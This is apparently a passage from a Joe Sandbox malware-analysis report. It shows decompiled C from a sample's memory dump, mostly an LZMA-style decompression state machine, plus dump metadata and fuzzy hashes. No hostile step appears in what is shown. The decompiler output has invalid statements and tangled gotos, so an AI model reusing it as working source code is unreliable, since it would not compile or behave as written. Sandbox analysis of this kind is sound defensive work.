                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                													__eflags = __eax -  *(__ebp - 0x74);
                													if(__eax >=  *(__ebp - 0x74)) {
                														__eax = __eax +  *(__ebp - 0x74);
                														__eflags = __eax;
                													}
                													__ecx =  *(__ebp - 8);
                													__ebx = 0;
                													__ebx = 1;
                													__al =  *((intOrPtr*)(__eax + __ecx));
                													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                													goto L41;
                												}
                											case 7:
                												goto L0;
                											case 8:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__eax =  *(__ebp - 4);
                													__ecx =  *(__ebp - 0x38);
                													 *(__ebp - 0x84) = 0xa;
                													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                												} else {
                													__eax =  *(__ebp - 0x38);
                													__ecx =  *(__ebp - 4);
                													__eax =  *(__ebp - 0x38) + 0xf;
                													 *(__ebp - 0x84) = 9;
                													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                												}
                												while(1) {
                													L132:
                													 *(_t621 - 0x54) = _t614;
                													goto L133;
                												}
                											case 9:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													goto L89;
                												}
                												__eflags =  *(__ebp - 0x60);
                												if( *(__ebp - 0x60) == 0) {
                													goto L171;
                												}
                												__eax = 0;
                												__eflags =  *(__ebp - 0x38) - 7;
                												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                												__eflags = _t258;
                												0 | _t258 = _t258 + _t258 + 9;
                												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                												goto L75;
                											case 0xa:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__eax =  *(__ebp - 4);
                													__ecx =  *(__ebp - 0x38);
                													 *(__ebp - 0x84) = 0xb;
                													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                													while(1) {
                														L132:
                														 *(_t621 - 0x54) = _t614;
                														goto L133;
                													}
                												}
                												__eax =  *(__ebp - 0x28);
                												goto L88;
                											case 0xb:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__ecx =  *(__ebp - 0x24);
                													__eax =  *(__ebp - 0x20);
                													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                												} else {
                													__eax =  *(__ebp - 0x24);
                												}
                												__ecx =  *(__ebp - 0x28);
                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                												L88:
                												__ecx =  *(__ebp - 0x2c);
                												 *(__ebp - 0x2c) = __eax;
                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                												L89:
                												__eax =  *(__ebp - 4);
                												 *(__ebp - 0x80) = 0x15;
                												__eax =  *(__ebp - 4) + 0xa68;
                												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                												goto L68;
                											case 0xc:
                												L99:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0xc;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t334 = __ebp - 0x70;
                												 *_t334 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t334;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												__eax =  *(__ebp - 0x2c);
                												goto L101;
                											case 0xd:
                												L37:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0xd;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t122 = __ebp - 0x70;
                												 *_t122 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t122;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												L39:
                												__eax =  *(__ebp - 0x40);
                												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                													goto L48;
                												}
                												__eflags = __ebx - 0x100;
                												if(__ebx >= 0x100) {
                													goto L54;
                												}
                												L41:
                												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                												__ecx =  *(__ebp - 0x58);
                												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                												 *(__ebp - 0x48) = __eax;
                												__eax = __eax + 1;
                												__eax = __eax << 8;
                												__eax = __eax + __ebx;
                												__esi =  *(__ebp - 0x58) + __eax * 2;
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                												__ax =  *__esi;
                												 *(__ebp - 0x54) = __esi;
                												__edx = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													 *(__ebp - 0x40) = 1;
                													__cx = __ax >> 5;
                													__eflags = __eax;
                													__ebx = __ebx + __ebx + 1;
                													 *__esi = __ax;
                												} else {
                													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edx;
                													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                													__ebx = __ebx + __ebx;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													goto L39;
                												} else {
                													goto L37;
                												}
                											case 0xe:
                												L46:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0xe;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t156 = __ebp - 0x70;
                												 *_t156 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t156;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												while(1) {
                													L48:
                													__eflags = __ebx - 0x100;
                													if(__ebx >= 0x100) {
                														break;
                													}
                													__eax =  *(__ebp - 0x58);
                													__edx = __ebx + __ebx;
                													__ecx =  *(__ebp - 0x10);
                													__esi = __edx + __eax;
                													__ecx =  *(__ebp - 0x10) >> 0xb;
                													__ax =  *__esi;
                													 *(__ebp - 0x54) = __esi;
                													__edi = __ax & 0x0000ffff;
                													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                													__eflags =  *(__ebp - 0xc) - __ecx;
                													if( *(__ebp - 0xc) >= __ecx) {
                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                														__cx = __ax;
                														_t170 = __edx + 1; // 0x1
                														__ebx = _t170;
                														__cx = __ax >> 5;
                														__eflags = __eax;
                														 *__esi = __ax;
                													} else {
                														 *(__ebp - 0x10) = __ecx;
                														0x800 = 0x800 - __edi;
                														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                														__ebx = __ebx + __ebx;
                														 *__esi = __cx;
                													}
                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                													 *(__ebp - 0x44) = __ebx;
                													if( *(__ebp - 0x10) >= 0x1000000) {
                														continue;
                													} else {
                														goto L46;
                													}
                												}
                												L54:
                												_t173 = __ebp - 0x34;
                												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                												__eflags =  *_t173;
                												goto L55;
                											case 0xf:
                												L58:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0xf;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t203 = __ebp - 0x70;
                												 *_t203 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t203;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												L60:
                												__eflags = __ebx - 0x100;
                												if(__ebx >= 0x100) {
                													L55:
                													__al =  *(__ebp - 0x44);
                													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                													goto L56;
                												}
                												L61:
                												__eax =  *(__ebp - 0x58);
                												__edx = __ebx + __ebx;
                												__ecx =  *(__ebp - 0x10);
                												__esi = __edx + __eax;
                												__ecx =  *(__ebp - 0x10) >> 0xb;
                												__ax =  *__esi;
                												 *(__ebp - 0x54) = __esi;
                												__edi = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													_t217 = __edx + 1; // 0x1
                													__ebx = _t217;
                													__cx = __ax >> 5;
                													__eflags = __eax;
                													 *__esi = __ax;
                												} else {
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edi;
                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                													__ebx = __ebx + __ebx;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													goto L60;
                												} else {
                													goto L58;
                												}
                											case 0x10:
                												L109:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0x10;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t365 = __ebp - 0x70;
                												 *_t365 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t365;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												goto L111;
                											case 0x11:
                												L68:
                												_t614 =  *(_t621 - 0x58);
                												 *(_t621 - 0x84) = 0x12;
                												while(1) {
                													L132:
                													 *(_t621 - 0x54) = _t614;
                													goto L133;
                												}
                											case 0x12:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__eax =  *(__ebp - 0x58);
                													 *(__ebp - 0x84) = 0x13;
                													__esi =  *(__ebp - 0x58) + 2;
                													while(1) {
                														L132:
                														 *(_t621 - 0x54) = _t614;
                														goto L133;
                													}
                												}
                												__eax =  *(__ebp - 0x4c);
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                												__ecx =  *(__ebp - 0x58);
                												__eax =  *(__ebp - 0x4c) << 4;
                												__eflags = __eax;
                												__eax =  *(__ebp - 0x58) + __eax + 4;
                												goto L130;
                											case 0x13:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													_t469 = __ebp - 0x58;
                													 *_t469 =  *(__ebp - 0x58) + 0x204;
                													__eflags =  *_t469;
                													 *(__ebp - 0x30) = 0x10;
                													 *(__ebp - 0x40) = 8;
                													L144:
                													 *(__ebp - 0x7c) = 0x14;
                													goto L145;
                												}
                												__eax =  *(__ebp - 0x4c);
                												__ecx =  *(__ebp - 0x58);
                												__eax =  *(__ebp - 0x4c) << 4;
                												 *(__ebp - 0x30) = 8;
                												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                												L130:
                												 *(__ebp - 0x58) = __eax;
                												 *(__ebp - 0x40) = 3;
                												goto L144;
                											case 0x14:
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                												__eax =  *(__ebp - 0x80);
                												 *(_t621 - 0x88) = _t542;
                												goto L1;
                											case 0x15:
                												__eax = 0;
                												__eflags =  *(__ebp - 0x38) - 7;
                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                												__al = __al & 0x000000fd;
                												__eax = (__eflags >= 0) - 1 + 0xb;
                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                												goto L120;
                											case 0x16:
                												__eax =  *(__ebp - 0x30);
                												__eflags = __eax - 4;
                												if(__eax >= 4) {
                													_push(3);
                													_pop(__eax);
                												}
                												__ecx =  *(__ebp - 4);
                												 *(__ebp - 0x40) = 6;
                												__eax = __eax << 7;
                												 *(__ebp - 0x7c) = 0x19;
                												 *(__ebp - 0x58) = __eax;
                												goto L145;
                											case 0x17:
                												L145:
                												__eax =  *(__ebp - 0x40);
                												 *(__ebp - 0x50) = 1;
                												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                												goto L149;
                											case 0x18:
                												L146:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0x18;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t484 = __ebp - 0x70;
                												 *_t484 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t484;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												L148:
                												_t487 = __ebp - 0x48;
                												 *_t487 =  *(__ebp - 0x48) - 1;
                												__eflags =  *_t487;
                												L149:
                												__eflags =  *(__ebp - 0x48);
                												if( *(__ebp - 0x48) <= 0) {
                													__ecx =  *(__ebp - 0x40);
                													__ebx =  *(__ebp - 0x50);
                													0 = 1;
                													__eax = 1 << __cl;
                													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                													__eax =  *(__ebp - 0x7c);
                													 *(__ebp - 0x44) = __ebx;
                													while(1) {
                														 *(_t621 - 0x88) = _t542;
                														goto L1;
                													}
                												}
                												__eax =  *(__ebp - 0x50);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                												__eax =  *(__ebp - 0x58);
                												__esi = __edx + __eax;
                												 *(__ebp - 0x54) = __esi;
                												__ax =  *__esi;
                												__edi = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													__cx = __ax >> 5;
                													__eax = __eax - __ecx;
                													__edx = __edx + 1;
                													__eflags = __edx;
                													 *__esi = __ax;
                													 *(__ebp - 0x50) = __edx;
                												} else {
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edi;
                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													goto L148;
                												} else {
                													goto L146;
                												}
                											case 0x19:
                												__eflags = __ebx - 4;
                												if(__ebx < 4) {
                													 *(__ebp - 0x2c) = __ebx;
                													L119:
                													_t393 = __ebp - 0x2c;
                													 *_t393 =  *(__ebp - 0x2c) + 1;
                													__eflags =  *_t393;
                													L120:
                													__eax =  *(__ebp - 0x2c);
                													__eflags = __eax;
                													if(__eax == 0) {
                														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                														goto L170;
                													}
                													__eflags = __eax -  *(__ebp - 0x60);
                													if(__eax >  *(__ebp - 0x60)) {
                														goto L171;
                													}
                													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                													__eax =  *(__ebp - 0x30);
                													_t400 = __ebp - 0x60;
                													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                													__eflags =  *_t400;
                													goto L123;
                												}
                												__ecx = __ebx;
                												__eax = __ebx;
                												__ecx = __ebx >> 1;
                												__eax = __ebx & 0x00000001;
                												__ecx = (__ebx >> 1) - 1;
                												__al = __al | 0x00000002;
                												__eax = (__ebx & 0x00000001) << __cl;
                												__eflags = __ebx - 0xe;
                												 *(__ebp - 0x2c) = __eax;
                												if(__ebx >= 0xe) {
                													__ebx = 0;
                													 *(__ebp - 0x48) = __ecx;
                													L102:
                													__eflags =  *(__ebp - 0x48);
                													if( *(__ebp - 0x48) <= 0) {
                														__eax = __eax + __ebx;
                														 *(__ebp - 0x40) = 4;
                														 *(__ebp - 0x2c) = __eax;
                														__eax =  *(__ebp - 4);
                														__eax =  *(__ebp - 4) + 0x644;
                														__eflags = __eax;
                														L108:
                														__ebx = 0;
                														 *(__ebp - 0x58) = __eax;
                														 *(__ebp - 0x50) = 1;
                														 *(__ebp - 0x44) = 0;
                														 *(__ebp - 0x48) = 0;
                														L112:
                														__eax =  *(__ebp - 0x40);
                														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                															_t391 = __ebp - 0x2c;
                															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                															__eflags =  *_t391;
                															goto L119;
                														}
                														__eax =  *(__ebp - 0x50);
                														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                														__eax =  *(__ebp - 0x58);
                														__esi = __edi + __eax;
                														 *(__ebp - 0x54) = __esi;
                														__ax =  *__esi;
                														__ecx = __ax & 0x0000ffff;
                														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                														__eflags =  *(__ebp - 0xc) - __edx;
                														if( *(__ebp - 0xc) >= __edx) {
                															__ecx = 0;
                															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                															__ecx = 1;
                															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                															__ebx = 1;
                															__ecx =  *(__ebp - 0x48);
                															__ebx = 1 << __cl;
                															__ecx = 1 << __cl;
                															__ebx =  *(__ebp - 0x44);
                															__ebx =  *(__ebp - 0x44) | __ecx;
                															__cx = __ax;
                															__cx = __ax >> 5;
                															__eax = __eax - __ecx;
                															__edi = __edi + 1;
                															__eflags = __edi;
                															 *(__ebp - 0x44) = __ebx;
                															 *__esi = __ax;
                															 *(__ebp - 0x50) = __edi;
                														} else {
                															 *(__ebp - 0x10) = __edx;
                															0x800 = 0x800 - __ecx;
                															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                															 *__esi = __dx;
                														}
                														__eflags =  *(__ebp - 0x10) - 0x1000000;
                														if( *(__ebp - 0x10) >= 0x1000000) {
                															L111:
                															_t368 = __ebp - 0x48;
                															 *_t368 =  *(__ebp - 0x48) + 1;
                															__eflags =  *_t368;
                															goto L112;
                														} else {
                															goto L109;
                														}
                													}
                													__ecx =  *(__ebp - 0xc);
                													__ebx = __ebx + __ebx;
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                													 *(__ebp - 0x44) = __ebx;
                													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                														__ecx =  *(__ebp - 0x10);
                														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                														__ebx = __ebx | 0x00000001;
                														__eflags = __ebx;
                														 *(__ebp - 0x44) = __ebx;
                													}
                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                													if( *(__ebp - 0x10) >= 0x1000000) {
                														L101:
                														_t338 = __ebp - 0x48;
                														 *_t338 =  *(__ebp - 0x48) - 1;
                														__eflags =  *_t338;
                														goto L102;
                													} else {
                														goto L99;
                													}
                												}
                												__edx =  *(__ebp - 4);
                												__eax = __eax - __ebx;
                												 *(__ebp - 0x40) = __ecx;
                												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                												goto L108;
                											case 0x1a:
                												L56:
                												__eflags =  *(__ebp - 0x64);
                												if( *(__ebp - 0x64) == 0) {
                													 *(__ebp - 0x88) = 0x1a;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x68);
                												__al =  *(__ebp - 0x5c);
                												__edx =  *(__ebp - 8);
                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                												 *( *(__ebp - 0x68)) = __al;
                												__ecx =  *(__ebp - 0x14);
                												 *(__ecx +  *(__ebp - 8)) = __al;
                												__eax = __ecx + 1;
                												__edx = 0;
                												_t192 = __eax %  *(__ebp - 0x74);
                												__eax = __eax /  *(__ebp - 0x74);
                												__edx = _t192;
                												goto L79;
                											case 0x1b:
                												L75:
                												__eflags =  *(__ebp - 0x64);
                												if( *(__ebp - 0x64) == 0) {
                													 *(__ebp - 0x88) = 0x1b;
                													goto L170;
                												}
                												__eax =  *(__ebp - 0x14);
                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                												__eflags = __eax -  *(__ebp - 0x74);
                												if(__eax >=  *(__ebp - 0x74)) {
                													__eax = __eax +  *(__ebp - 0x74);
                													__eflags = __eax;
                												}
                												__edx =  *(__ebp - 8);
                												__cl =  *(__eax + __edx);
                												__eax =  *(__ebp - 0x14);
                												 *(__ebp - 0x5c) = __cl;
                												 *(__eax + __edx) = __cl;
                												__eax = __eax + 1;
                												__edx = 0;
                												_t274 = __eax %  *(__ebp - 0x74);
                												__eax = __eax /  *(__ebp - 0x74);
                												__edx = _t274;
                												__eax =  *(__ebp - 0x68);
                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                												_t283 = __ebp - 0x64;
                												 *_t283 =  *(__ebp - 0x64) - 1;
                												__eflags =  *_t283;
                												 *( *(__ebp - 0x68)) = __cl;
                												L79:
                												 *(__ebp - 0x14) = __edx;
                												goto L80;
                											case 0x1c:
                												while(1) {
                													L123:
                													__eflags =  *(__ebp - 0x64);
                													if( *(__ebp - 0x64) == 0) {
                														break;
                													}
                													__eax =  *(__ebp - 0x14);
                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                													__eflags = __eax -  *(__ebp - 0x74);
                													if(__eax >=  *(__ebp - 0x74)) {
                														__eax = __eax +  *(__ebp - 0x74);
                														__eflags = __eax;
                													}
                													__edx =  *(__ebp - 8);
                													__cl =  *(__eax + __edx);
                													__eax =  *(__ebp - 0x14);
                													 *(__ebp - 0x5c) = __cl;
                													 *(__eax + __edx) = __cl;
                													__eax = __eax + 1;
                													__edx = 0;
                													_t414 = __eax %  *(__ebp - 0x74);
                													__eax = __eax /  *(__ebp - 0x74);
                													__edx = _t414;
                													__eax =  *(__ebp - 0x68);
                													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                													__eflags =  *(__ebp - 0x30);
                													 *( *(__ebp - 0x68)) = __cl;
                													 *(__ebp - 0x14) = _t414;
                													if( *(__ebp - 0x30) > 0) {
                														continue;
                													} else {
                														L80:
                														 *(__ebp - 0x88) = 2;
                														goto L1;
                													}
                												}
                												 *(__ebp - 0x88) = 0x1c;
                												goto L170;
                										}
                									}
                									L171:
                									_t544 = _t543 | 0xffffffff;
                									goto L172;
                								}
                							}
                						}
                					}
                					goto L1;
                				}
                			}















                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 23d90c1db76db7edd9cc4d8a45db571517f104fb6d742d4438539565e12cc062
                • Instruction ID: ded64b1a4db59f6dff1a94f5a9d162ff15a4dde6347ba0f82720ffa54b61a1b0
                • Opcode Fuzzy Hash: 23d90c1db76db7edd9cc4d8a45db571517f104fb6d742d4438539565e12cc062
                • Instruction Fuzzy Hash: 09711371D00229CFDF28CF98C844BADBBB1FB44305F25816AD856BB281D7789A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E00406440() {
                				unsigned short _t531;
                				signed int _t532;
                				void _t533;
                				signed int _t534;
                				signed int _t535;
                				signed int _t565;
                				signed int _t568;
                				signed int _t589;
                				signed int* _t606;
                				void* _t613;
                
                				L0:
                				while(1) {
                					L0:
                					if( *(_t613 - 0x40) != 0) {
                						 *(_t613 - 0x84) = 0xb;
                						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                						goto L132;
                					} else {
                						__eax =  *(__ebp - 0x28);
                						L88:
                						 *(__ebp - 0x2c) = __eax;
                						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                						L89:
                						__eax =  *(__ebp - 4);
                						 *(__ebp - 0x80) = 0x15;
                						__eax =  *(__ebp - 4) + 0xa68;
                						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                						L69:
                						 *(__ebp - 0x84) = 0x12;
                						while(1) {
                							L132:
                							 *(_t613 - 0x54) = _t606;
                							while(1) {
                								L133:
                								_t531 =  *_t606;
                								_t589 = _t531 & 0x0000ffff;
                								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                								if( *(_t613 - 0xc) >= _t565) {
                									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                									 *(_t613 - 0x40) = 1;
                									_t532 = _t531 - (_t531 >> 5);
                									 *_t606 = _t532;
                								} else {
                									 *(_t613 - 0x10) = _t565;
                									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                								}
                								if( *(_t613 - 0x10) >= 0x1000000) {
                									goto L139;
                								}
                								L137:
                								if( *(_t613 - 0x6c) == 0) {
                									 *(_t613 - 0x88) = 5;
                									L170:
                									_t568 = 0x22;
                									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                									_t535 = 0;
                									L172:
                									return _t535;
                								}
